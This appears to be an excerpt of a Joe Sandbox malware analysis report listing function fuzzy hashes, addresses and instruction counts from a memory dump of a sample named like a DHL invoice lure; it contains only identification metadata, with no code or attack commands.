Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601deb05ff41af5c8dd1e961e9c992636072588225558e4ed006a8989aa4ca89
Instruction ID: a78650d2c665e6501981a88e60072ee0f9aeac3e4fd8851df6324321c353372c
Opcode Fuzzy Hash: 601deb05ff41af5c8dd1e961e9c992636072588225558e4ed006a8989aa4ca89
Instruction Fuzzy Hash: AE41C376604752DFD320DF68C940A6AB7E9FFC8B40F18061DF99997680E730E905C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 01944859 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf17a58dca4182e4650a499ba322944f1014efec69ff9d7422075ce2833e7d6
Instruction ID: 8ece338c12cad10595c4a297da9f68b3472a81c59e25ba0b64ccbce6cacbcb64
Opcode Fuzzy Hash: fdf17a58dca4182e4650a499ba322944f1014efec69ff9d7422075ce2833e7d6
Instruction Fuzzy Hash: 9C41D1356043028BE729DF28D884F2ABBE9FF80B55F14482DFA498B291DB30D901DB91

Uniqueness

Uniqueness Score: -1.00%

Function 019502E1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction ID: 94ac595194b2349355a5c4f58365dc4a1515d2598d0f4137ee4f25d7b190090c
Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction Fuzzy Hash: 61312531A04244AFDB52CB68CC44FEBBFE9AF54350F0845A5F85DE7352D2B49984CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019EE3DB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e150e00a66a73bde9cf1c224f6ba2d6ec61341648524bb4efcdef456d5b4d2bf
Instruction ID: 7f44248136aced3ea4fdb036723eaaf0ea17c9b9f7c483c16516458846e52606
Opcode Fuzzy Hash: e150e00a66a73bde9cf1c224f6ba2d6ec61341648524bb4efcdef456d5b4d2bf
Instruction Fuzzy Hash: D4319835750756ABD723DF55CC45F6B76F9AF99F50F000028BA08BB291DA64DD00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 019F4B4B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c7b511fe255cc605d2788c459fa17fef67098a23f547cd0e30faf21a8b0d77
Instruction ID: 7ca65c9674d29158a2ab2b45be665ffebcaddf9cbafa301e4520fd835e5a74cd
Opcode Fuzzy Hash: a7c7b511fe255cc605d2788c459fa17fef67098a23f547cd0e30faf21a8b0d77
Instruction Fuzzy Hash: 0A31CF32605201AFC321DF19D880F6AB7F9FB80361F0A446EFA9D9B252D730A905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01944260 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a15db3bc1d3d7f0ec835ae0afef5097bd2ffbbfbd1e64d3e643388873ba4d08
Instruction ID: 36555f9cb238e7dcaf05343fc92532e3411e739dc9579feecaa5093db5bddbe8
Opcode Fuzzy Hash: 2a15db3bc1d3d7f0ec835ae0afef5097bd2ffbbfbd1e64d3e643388873ba4d08
Instruction Fuzzy Hash: 0C41B171200745DFD726CF28C985FDA7BE9AF85754F058829FA5D8B250D770E844CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019F4BB0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6f8258533bdfd1b38aae01638bf7f015bed783863309980cde1f96fd0ddcd5
Instruction ID: e90ab9cdf5ca85cb761cda2ce8859ba4cc7897ee1d682115b2f9d359ce0e72b7
Opcode Fuzzy Hash: 0b6f8258533bdfd1b38aae01638bf7f015bed783863309980cde1f96fd0ddcd5
Instruction Fuzzy Hash: 16317071A04201AFD720DF29C880F6BB7E5FB84714F05496DFA5D9B251E730E905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019BEB1D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22daeb157ddef898588f5aa86c6cc945e269e12ac12f71cb431f2809365d9b6e
Instruction ID: 404e822138c4cc84775e9c1cce1db89c73a593cebf2c3e311100744bdfb0163d
Opcode Fuzzy Hash: 22daeb157ddef898588f5aa86c6cc945e269e12ac12f71cb431f2809365d9b6e
Instruction Fuzzy Hash: D431D8316016D29BF322975ECE88FE57BDCBF40781F1D00A4AE4E976D1DB28D940C225

Uniqueness

Uniqueness Score: -1.00%

Function 01A061C3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657c0f1e5f1e62ff77837d0b0464d1c1a4c0605f697e8af6a6ce063ebbf2f36e
Instruction ID: 35e1bd35047928ce7a536cbeebc7e02baec7d1e3c045575421667f6a52588f03
Opcode Fuzzy Hash: 657c0f1e5f1e62ff77837d0b0464d1c1a4c0605f697e8af6a6ce063ebbf2f36e
Instruction Fuzzy Hash: 5B31E175E0021AABDB16DF98CC40BAEB7B5FB48B44F454168E908AB284D770ED11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019E483A Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a871d8b0f8ce1b4eddb7df9b2a0371dd6dd4dbe34cd5526f261c2bd0c9007b
Instruction ID: 1ed6ae5a6b066d090a323cbc670fd6dba829be1b000f73d15e6dd4efe0102ac3
Opcode Fuzzy Hash: 01a871d8b0f8ce1b4eddb7df9b2a0371dd6dd4dbe34cd5526f261c2bd0c9007b
Instruction Fuzzy Hash: 85313376A4012DABCB22DF54DC88BDE7BF9AB98750F1501A5E90CE7250DA30DE918F90

Uniqueness

Uniqueness Score: -1.00%

Function 0196EB20 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d061cf6bc13680e4759dfdb6afecb3cd6b86de42529cbf3208199f60a55788
Instruction ID: 9ef889b616d4f3ee1a972eab07621f2d4005ac69c0e70d98c950b7b3e23d5b4b
Opcode Fuzzy Hash: 36d061cf6bc13680e4759dfdb6afecb3cd6b86de42529cbf3208199f60a55788
Instruction Fuzzy Hash: C831A476E10619AFDB21DEBAC840EAEBBBCEF44750F014465E919E7250D7709A008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01A060B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 313d6f5028fbf21de2172e9f29467766f896d27111b77c1e26782bf9275a9ca6
Instruction ID: f275e1377bfa12d45d76f081023f1a2127040395006ffb01787a85b27bf0ac03
Opcode Fuzzy Hash: 313d6f5028fbf21de2172e9f29467766f896d27111b77c1e26782bf9275a9ca6
Instruction Fuzzy Hash: EC31C271B40706ABDB13DF99DC50B6AB7B9AF88758F044069F509EB382DA70DD118B90

Uniqueness

Uniqueness Score: -1.00%

Function 019407AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0d694cabc143e4fd6970c91a75172dfd4f38fc9215e99da0012a664c440d8e
Instruction ID: e70a417052b3136ce08d2c5024dd570a5f08a56f07fe4a6043691843fe68bda9
Opcode Fuzzy Hash: fb0d694cabc143e4fd6970c91a75172dfd4f38fc9215e99da0012a664c440d8e
Instruction Fuzzy Hash: D231F932E04756DBD712DE28C940EABBBA5AFD4250F094929FE5D97310EA31DC0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 01948550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eae08bbddf009c4c8cb432230bb14de3da52177352f6232548521054853d315
Instruction ID: cfb2e2e8b630a60da523afa1beda8bcbb14e47a74bfe6c8426e97a103f4ec93e
Opcode Fuzzy Hash: 9eae08bbddf009c4c8cb432230bb14de3da52177352f6232548521054853d315
Instruction Fuzzy Hash: D1319A716093119FE360CF59C840F2BBBE9FB98700F454AAEE98897251D770E848CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0197A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction ID: ff6c8be06c6a3abe2f7983f0f15838efdb049593b64cc08b6e4f38c19306cecf
Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction Fuzzy Hash: 8031FAB2B00701AFD765CF6DDE81B5ABBF8AF48650F18492DA59EC3651E630F9008B64

Uniqueness

Uniqueness Score: -1.00%

Function 019EEBD0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7928ad133854f2515a789302c029ef44d3c646d4dd92cb6d75b2f799a05ab30e
Instruction ID: 54e144083ae77384c006709d430283cf637286df75f064cb7d64bf3e8f632277
Opcode Fuzzy Hash: 7928ad133854f2515a789302c029ef44d3c646d4dd92cb6d75b2f799a05ab30e
Instruction Fuzzy Hash: FE319871909301DFCB12DF19C548A5ABBF5FF89614F0449AEF88C9B311D3309A55CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0196438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf579d898f6d303d5ccac84bf681bf9ae362241e9fe8762db0c60a61adc5edc3
Instruction ID: 1936f65c4f3639cd9b544d84b914ae6190de374805dfccb5676236b4316b348d
Opcode Fuzzy Hash: cf579d898f6d303d5ccac84bf681bf9ae362241e9fe8762db0c60a61adc5edc3
Instruction Fuzzy Hash: 5431D431B002069FD724EFE9C981B6EBBFDAB84744F008529D54ED7654D730E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0193CB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction ID: 0efcfdbd713582e9085e839f5c6f5658e54fca74d2e49f47875dce5d7337a8a9
Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction Fuzzy Hash: 3E212832E0065BAADB11DBB9C801BAFBBB9EF94740F0584369E19F7340E270D900C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0193C156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432a8434d2111bfd205b0055fb98e4eb5701849cd4fcbb2734f73b82dd4c0284
Instruction ID: 552c61d352854a097bb246fa0584c02fecbeb66aeba95273c5e9a465375e833e
Opcode Fuzzy Hash: 432a8434d2111bfd205b0055fb98e4eb5701849cd4fcbb2734f73b82dd4c0284
Instruction Fuzzy Hash: 45313BB55002019BDB21EF6CCC81B7977F8EF91314F548169ED4D9B382EA34D986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019FC3CD Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction ID: 1bfb303e523a60932db005c2eb60f4fa7c54703292b28c83ac91fb90fc4bd0e6
Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction Fuzzy Hash: 0D213D3A60065AB6CB15AB95CC00EBBBBB4EFC0B10F40C01EFB9D87691E634D940C760

Uniqueness

Uniqueness Score: -1.00%

Function 0193E420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a35cb55b8519d78fff844953827e72679bd3e251fe84198096e384d4aaea84
Instruction ID: 3728c9b46b1fc4abb13bb5a219096b717fe50b99952be7023973d373420ddf11
Opcode Fuzzy Hash: 38a35cb55b8519d78fff844953827e72679bd3e251fe84198096e384d4aaea84
Instruction Fuzzy Hash: C331E832A0152C9BDB31DF18CC45FEE77B9EB95B40F0104A1EA4DA7290D674AE808F90

Uniqueness

Uniqueness Score: -1.00%

Function 01974588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction ID: 824ec46475b95dccf343d5f3d886c599d1a1009ce752753719c3ab0eae58e3b4
Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction Fuzzy Hash: 40218375A00609EFCB15CF58C984A9EBBB9FF48714F108065EE199F242D671EE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019744B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e099b779207f8a65b2a05e59dfff564a3dbf730c2c6fcabc961c78c173d34c0c
Instruction ID: c512ae1fedabc572e3024f23e4edde239cc07ff9eaa4c42d4a45f3d09222bb18
Opcode Fuzzy Hash: e099b779207f8a65b2a05e59dfff564a3dbf730c2c6fcabc961c78c173d34c0c
Instruction Fuzzy Hash: EE21B172A047459BC722DF18C880B6BB7E9FFC8761F004919FD5CAB642D730E9118BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0193E388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction ID: 99a0cbaba9183fdd021ac92f8c7028e48800c6379788e110f9e58094e82c0749
Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction Fuzzy Hash: D4318B31600605EFDB21DFA8C884F6AB7F9FF85354F1449A9E55A9B290E730EE01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019BE609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8218634e196856740902bb50121b1991dfefa74f83ea9b0eec9b35f7ddb416bc
Instruction ID: eb0f468d5fd1ead195366bfde981c07a365298e655012a9a50ef956919183a26
Opcode Fuzzy Hash: 8218634e196856740902bb50121b1991dfefa74f83ea9b0eec9b35f7ddb416bc
Instruction Fuzzy Hash: 65316D79A00206EFCB15CF18C984AEEB7B9FF84304B15445AF84E9B395E771EA50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 019C06F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392f125d0c0b70ec03417e20a0c21de1e3e9461b18e30b1fe1be3efdeb6a2c00
Instruction ID: 7dbfc40dac1308d407915cc8a9b972f989df6290fdf2bbd51502a5a8a4036178
Opcode Fuzzy Hash: 392f125d0c0b70ec03417e20a0c21de1e3e9461b18e30b1fe1be3efdeb6a2c00
Instruction Fuzzy Hash: 7121AD75900229EBCF25DF59C881ABEB7F8FF88740F440069F945AB240D738AD52CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019C019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f76ab10179cbb95c07a1f68cd795a26004ea1fc59803b11144fa337ebbc0a79
Instruction ID: 899dc2808f7ede3c9ca21773b595eaee3fc3eb8a4ef0ae6ed5e44fe9d87b2e7a
Opcode Fuzzy Hash: 0f76ab10179cbb95c07a1f68cd795a26004ea1fc59803b11144fa337ebbc0a79
Instruction Fuzzy Hash: 9D21AB75A00645EBD715DF6DC840F6AB7B8FF88B80F180069F948E76A0D634ED00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 019C0283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db8fd350c57164d0084e3793386ee58af718e7b7c2e7d1989409f2e59f79fe1
Instruction ID: bbf17126f07410cc39067f5be61900c76ad72c13bc8ddb24dd93f9d4ab5dcbe9
Opcode Fuzzy Hash: 3db8fd350c57164d0084e3793386ee58af718e7b7c2e7d1989409f2e59f79fe1
Instruction Fuzzy Hash: 5921AF72904346DBD711EF9AC844B6BBBECAFE1A40F0C045ABDC88B251D734DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01962835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c08caa37ee51f7aa37411d46897bbe65b05483ece2b662ec08d78db7a520a4
Instruction ID: 5c3daf720c633ad3d9ac9d1288c15ca3fbd575b2d32670fab90a7c512afc9cd6
Opcode Fuzzy Hash: 99c08caa37ee51f7aa37411d46897bbe65b05483ece2b662ec08d78db7a520a4
Instruction Fuzzy Hash: 60210B316056819BE322976D8C04F287B9CBF81B75F1803A4FA69AB6E2D768C901C391

Uniqueness

Uniqueness Score: -1.00%

Function 0197A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e1010764bf328b6ee65f1799720ebca67dc7e67395eee26d4949f6cd5f4804
Instruction ID: b9c708f880fa8bef439611353494b60a6a3ac24a2361a48fd161ac6593cec005
Opcode Fuzzy Hash: 92e1010764bf328b6ee65f1799720ebca67dc7e67395eee26d4949f6cd5f4804
Instruction Fuzzy Hash: 4E21BE35200601AFC725DF29CD41B4677F5FF48744F188468A50DCBB61E371E942CB94

Uniqueness

Uniqueness Score: -1.00%

Function 019FA49A Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a411b1503cde73d957c17028c1011e849aea34473f2fee40048f64fb31d5474c
Instruction ID: fcae763c33badd87150fb9d8742c33f94c6b2cff31facf934c2735ff89015e71
Opcode Fuzzy Hash: a411b1503cde73d957c17028c1011e849aea34473f2fee40048f64fb31d5474c
Instruction Fuzzy Hash: 6C112972380B11BFE32296699C45F2F7A9ADBD4B60F11042CB70CDB290EB70EC018795

Uniqueness

Uniqueness Score: -1.00%

Function 019C0946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40e1d7d4280fdaad435548ebcabe56ac9bed326085d9b28187d1fd6177327953
Instruction ID: 7ab528c16254035252c5cf43832f8c96baf7222c77b6a9bf1c1a04663779d3d0
Opcode Fuzzy Hash: 40e1d7d4280fdaad435548ebcabe56ac9bed326085d9b28187d1fd6177327953
Instruction Fuzzy Hash: 1E21EBB5E00219ABDB24DF9AD885AAEFBF9FF98600F10012EE409A7240D7709941CB55

Uniqueness

Uniqueness Score: -1.00%

Function 019D80A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction ID: 5b3427602595b81a349dd352a6d518ecef41e23bb72c4d4f2adae49df446f97e
Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction Fuzzy Hash: 63216D72A00209AFDB129FA8CC40BAEBBB9FF98350F208855F908A7252D734D9509B50

Uniqueness

Uniqueness Score: -1.00%

Function 01970124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: 8df38bb8c91de84d0e452365362369cd51e4f3b20eb58697faa1eb2a7a13bba1
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 6311E272600605BFE7229F44DC80F9BBBBDEF81754F140029F6099B190D6B1ED44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01948770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

